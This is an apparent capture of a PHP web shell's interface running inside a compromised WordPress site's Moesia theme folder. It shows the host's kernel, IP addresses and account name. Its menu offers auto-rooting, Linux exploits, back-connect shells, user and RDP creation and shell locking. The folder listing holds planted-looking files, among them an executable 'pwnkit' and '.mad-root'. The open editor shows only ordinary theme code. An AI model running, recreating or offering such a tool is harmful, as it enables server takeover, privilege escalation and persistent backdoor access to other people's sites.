Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
moesia /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
prettyphoto
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
custom-header.php
3.11
KB
-rw-r--r--
customizer.php
82.3
KB
-rw-r--r--
extras.php
2.3
KB
-rw-r--r--
jetpack.php
392
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rows.php
2.56
KB
-rw-r--r--
template-tags.php
4.24
KB
-rw-r--r--
tha-theme-hooks.php
4.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom-header.php
<?php /** * Sample implementation of the Custom Header feature * http://codex.wordpress.org/Custom_Headers * * You can add an optional custom header image to header.php like so ... <?php if ( get_header_image() ) : ?> <a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"> <img src="<?php header_image(); ?>" width="<?php echo get_custom_header()->width; ?>" height="<?php echo get_custom_header()->height; ?>" alt=""> </a> <?php endif; // End header image check. ?> * * @package Moesia */ /** * Setup the WordPress core custom header feature. * * @uses moesia_header_style() * @uses moesia_admin_header_style() * @uses moesia_admin_header_image() */ function moesia_custom_header_setup() { add_theme_support( 'custom-header', apply_filters( 'moesia_custom_header_args', array( 'default-image' => get_template_directory_uri() . '/images/header.jpg', 'width' => 1920, 'height' => 1080, 'flex-height' => true, 'wp-head-callback' => 'moesia_header_style', 'admin-head-callback' => 'moesia_admin_header_style', 'admin-preview-callback' => 'moesia_admin_header_image', ) ) ); } add_action( 'after_setup_theme', 'moesia_custom_header_setup' ); if ( ! function_exists( 'moesia_header_style' ) ) : /** * Styles the header image * * @see moesia_custom_header_setup(). */ function moesia_header_style() { $himage = get_post_meta( get_the_ID(), 'wpcf-header-image', true ); if ( get_header_image() || $himage !='' ) { ?> <style type="text/css"> @media only screen and (min-width: 1025px) { .has-banner:after { <?php if ( is_page() && $himage != '' ) : ?> background-image: url(<?php echo esc_url($himage); ?>); <?php else : ?> background-image: url(<?php echo get_header_image(); ?>); <?php endif; ?> } } </style> <?php } } endif; // moesia_header_style if ( ! function_exists( 'moesia_admin_header_style' ) ) : /** * Styles the header image displayed on the Appearance > Header admin panel. * * @see moesia_custom_header_setup(). */ function moesia_admin_header_style() { ?> <style type="text/css"> .appearance_page_custom-header #headimg { border: none; } #headimg h1, #desc { } #headimg h1 { } #headimg h1 a { } #desc { } #headimg img { } </style> <?php } endif; // moesia_admin_header_style if ( ! function_exists( 'moesia_admin_header_image' ) ) : /** * Custom header image markup displayed on the Appearance > Header admin panel. * * @see moesia_custom_header_setup(). */ function moesia_admin_header_image() { $style = sprintf( ' style="color:#%s;"', get_header_textcolor() ); ?> <div id="headimg"> <h1 class="displaying-header-text"><a id="name"<?php echo $style; ?> onclick="return false;" href="<?php echo esc_url( home_url( '/' ) ); ?>"><?php bloginfo( 'name' ); ?></a></h1> <div class="displaying-header-text" id="desc"<?php echo $style; ?>><?php bloginfo( 'description' ); ?></div> <?php if ( get_header_image() ) : ?> <img src="<?php header_image(); ?>" alt=""> <?php endif; ?> </div> <?php } endif; // moesia_admin_header_image
Close